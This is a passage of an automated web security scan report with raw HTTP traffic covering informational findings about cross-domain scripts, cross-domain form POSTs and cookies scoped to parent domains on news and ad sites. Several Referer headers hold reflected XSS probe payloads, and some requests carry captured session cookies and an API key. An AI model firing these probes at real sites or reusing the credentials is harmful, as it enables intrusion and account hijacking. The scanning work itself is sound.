User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:48:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:25 GMT
Content-Length: 430

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D86400"></scr'+'ipt>');

Request 2

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:48:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:46 GMT
Content-Length: 395

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D86400"></scr'+'ipt>');

8.2. http://www.examiner.com/sites/all/modules/custom/pajito/widget/content/widget.js.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.examiner.com
Path:   /sites/all/modules/custom/pajito/widget/content/widget.js.php

Request 1

GET /sites/all/modules/custom/pajito/widget/content/widget.js.php?partner=nowpublic HTTP/1.1
Host: www.examiner.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 12 Sep 2011 12:48:21 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-WebNode: web8.b.examiner.com
Content-Length: 4694

(function (window, document) {
var sScript = 'script',
sIframe = 'iframe',
scriptId = 'examiner-pajita',
rHash = /^([^#]+)#(.*)$/,
/* examiner.com hosting content*/
contentURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/pajito-block.js.php?proxy=http%3A%2F%2Fwww.nowpublic.com%2FexaminerContainerProxy.html&partner=nowpublic",
/* Proxy path */
proxyURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/widget\/content\/contentProxy.php",
contentIframe,
proxyIframe,
hop = Object.prototype.hasOwnProperty,
unesc = window.decodeURIComponent,
esc = window.encodeURIComponent,
postMessage = 'postMessage',
canPost = typeof window[postMessage] == 'function',
targetOrigin = canPost && contentURI.match(/^http:\/\/[^\/]+/)[0],
setAttributes = function (attributes) {
var p;

for (p in attributes) {
if (hop.call(attributes, p)) {
this.setAttribute(p, attributes[p]);
}
}
},
addEvent = function (elm, evt, func) {
var f = function (event) {
var target;

if (!event) { event = window.event; }
if (event.target) { target = event.target; }
else if (event.srcElement) { target = event.srcElement; }
if (target && target.nodeType == 3) { target = target.parentNode; }

return func.apply(target, arguments);
};

if (elm.addEventListener) {
elm.addEventListener(evt, f, false);
}
else if (elm.attachEvent) {
elm.attachEvent(('on' + evt), f);
}
else {
elm['on' + evt] = f;
}
},
parseParameters = function (message) {
var items = {},
pairs = message.split(/&/),
pl = pairs.length,
i = 0,
value;

for (; i < pl; i += 1) {
value = pairs[i].split(/[=]/);
items[unesc(value[0])] = unesc(value[1]);
}

return items;
},
escapeParameters = function (data) {
var message = [],
p;

for (p in data) {
if (hop.call(data, p)) {
message.push(esc(p) + '=' +
...[SNIP]...

Request 2

GET /sites/all/modules/custom/pajito/widget/content/widget.js.php?partner=nowpublic HTTP/1.1
Host: www.examiner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 12 Sep 2011 12:48:50 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-WebNode: web10.b.examiner.com
Content-Length: 4751

(function (window, document) {
var sScript = 'script',
sIframe = 'iframe',
scriptId = 'examiner-pajita',
rHash = /^([^#]+)#(.*)$/,
/* examiner.com hosting content*/
contentURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/pajito-block.js.php?proxy=http%3A%2F%2Fwww.examiner.com%2Fsites%2Fall%2Fmodules%2Fcustom%2Fpajito%2Fwidget%2Fhost%2FexaminerContainerProxy.html&partner=nowpublic",
/* Proxy path */
proxyURI = "http:\/\/www.examiner.com\/sites\/all\/modules\/custom\/pajito\/widget\/content\/contentProxy.php",
contentIframe,
proxyIframe,
hop = Object.prototype.hasOwnProperty,
unesc = window.decodeURIComponent,
esc = window.encodeURIComponent,
postMessage = 'postMessage',
canPost = typeof window[postMessage] == 'function',
targetOrigin = canPost && contentURI.match(/^http:\/\/[^\/]+/)[0],
setAttributes = function (attributes) {
var p;

for (p in attributes) {
if (hop.call(attributes, p)) {
this.setAttribute(p, attributes[p]);
}
}
},
addEvent = function (elm, evt, func) {
var f = function (event) {
var target;

if (!event) { event = window.event; }
if (event.target) { target = event.target; }
else if (event.srcElement) { target = event.srcElement; }
if (target && target.nodeType == 3) { target = target.parentNode; }

return func.apply(target, arguments);
};

if (elm.addEventListener) {
elm.addEventListener(evt, f, false);
}
else if (elm.attachEvent) {
elm.attachEvent(('on' + evt), f);
}
else {
elm['on' + evt] = f;
}
},
parseParameters = function (message) {
var items = {},
pairs = message.split(/&/),
pl = pairs.length,
i = 0,
value;

for (; i < pl; i += 1) {
value = pairs[i].split(/[=]/);
items[unesc(value[0])] = unesc(value[1]);
}

return items;
},
escapeParameters = function (data) {
var message = [],
p;

for (p in data) {
if (hop
...[SNIP]...

9. Cross-domain POST  previous  next
There are 3 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


9.1. http://savannahnow.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain clicks.skem1.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 12:43:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 12:48:52 GMT
Last-Modified: Mon, 12 Sep 2011 12:43:52 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315831432"-gzip
Vary: Accept-Encoding
Content-Length: 149668
Content-Type: text/html; charset=utf-8
Age: 273
X-Cache: HIT from sms3.morris.com
X-Cache-Lookup: HIT from sms3.morris.com:3128
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<td style="width:200px; padding:4px 0px 0px 0px; margin:0px 0px 0px 0px;">
<form accept-charset="UTF-8" name="IBNSubscribe" action="http://clicks.skem1.com/signup/" method="POST" target="_blank">
<input name="c" value="2891" type="hidden">
...[SNIP]...

9.2. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /sites/all/modules/morris/yca_plugin/yahoo.cssca685

Issue detail

The page contains a form which POSTs data to the domain clicks.skem1.com. The form contains the following fields:

Request

GET /sites/all/modules/morris/yca_plugin/yahoo.cssca685 HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-morris.overture.com/js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685%22%3E%3Cscript%3Ealert(1)%3C/script%3E7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zvents_tracker_sid=13158497232050.9525420391000807; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=222803225.1251345904.1315849732.1315849732.1315849732.1; __utmb=222803225.4.10.1315849732; __utmc=222803225; __utmz=222803225.1315849732.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; bd-local=fb-id=1B3C6937-8DDC-4B7E-95C5-7878A957141E; _chartbeat2=mu28j07dwufmztf2.1315849749723; iePersistentData_Pencil_Expand_New_129534=1

Response

HTTP/1.0 404 Not Found
Date: Mon, 12 Sep 2011 12:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:04:58 GMT
Last-Modified: Mon, 12 Sep 2011 12:59:58 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315832398"-gzip
Vary: Accept-Encoding
Content-Length: 79084
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<td style="width:200px; padding:4px 0px 0px 0px; margin:0px 0px 0px 0px;">
<form accept-charset="UTF-8" name="IBNSubscribe" action="http://clicks.skem1.com/signup/" method="POST" target="_blank">
<input name="c" value="2891" type="hidden">
...[SNIP]...

9.3. http://www.popsci.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain popularscience.bonniersubscriptions.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.popsci.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: web4f D=18707
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Language: en
cache-control: max-age = 300
Content-Length: 116217
Date: Mon, 12 Sep 2011 12:48:09 GMT
X-Varnish: 1570744016 1570730120
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: webcache11: HIT 87

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
</div>
<form action="https://popularscience.bonniersubscriptions.com/HAG0-005/" method="post">
<div id="fields">
...[SNIP]...

10. Cookie scoped to parent domain  previous  next
There are 44 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=117090495&th=37103964303&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fc14.zedo.com%2FOzoDB%2Fcutils%2FR53_7_7%2Fjsc%2F1545%2Fzpu.html%3Fn%3D1545%3Bf%3D1%3Bz%3D2-110&f=2&p=9679837&a=1&rnd=9678783 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 09-Sep-2021 12:49:41 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 435
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg1213154547 = new Image();\r\n tfimg1213154547.src = "http://image2.pubmatic.com/AdServer/Pug?vcode=0";\r\n})();\r\n<\/sc
...[SNIP]...

10.2. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

10.3. http://api.bizographics.com/v1/profile.redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=ZDDH4OisxVKDXDYTFVciiWVtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWxZzbyauJoDaj5XcunNcMDa7Re6IGD4lIvNliiTsQ3d0Ad6xyMUDLG4HisD7PuAiisYPXoxU8ZPy3Exo4N71w46SKb0NrpeKvDEEAHRkUP4DRqbp7KchoR8KSjE5cmLaumWulAJAT7BX2HrsROqwTV75bDCe4W2moTMPW6Nj5X3Td87pcdJDAlOFM4SE3xQyPhdqGoP8BGM4wnZd9rxFhue7CnPt7OKf3925MlVpUzFqnOU3CJ2wtdwM8iiVTP0Et7iiJPsiim5vOPNb1QJipLd4ekU1f7MrQxrTtB1Wxn268X1nipp3OMCDTtSipisN9MTZe7RE8f54Pmyis0b2kXPJlCH2Dc5iivgsHGiiGKQLeexC7h8LZyqRAWM4Y0T5rNbhrhiprNS9j4rsWfOeTjexKjZ6ZI4Zomlgie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 12 Sep 2011 13:06:08 GMT
Location: http://dts1.raasnet.com/dts/bizo/in?industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXM6UUqwNaQIaj5XcunNcMDa7Re6IGD4lJwvYvTFPJeCAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRaQakHSuYMDekIwbdwzisbvEVUJBxdqAyBFiiNVUlT95AiiktrG07sTpWxGp85dzvukEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive


10.4. http://apis.google.com/js/plusone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk;Domain=.google.com;Path=/;Expires=Thu, 09-Sep-2021 13:04:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Mon, 12 Sep 2011 13:04:27 GMT
Date: Mon, 12 Sep 2011 13:04:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5398

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23579912-2b1b2e17';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

10.5. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=172392041&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.dome9.com%252F%26jsref%3D%26rnd%3D1315849265708&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.dome9.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
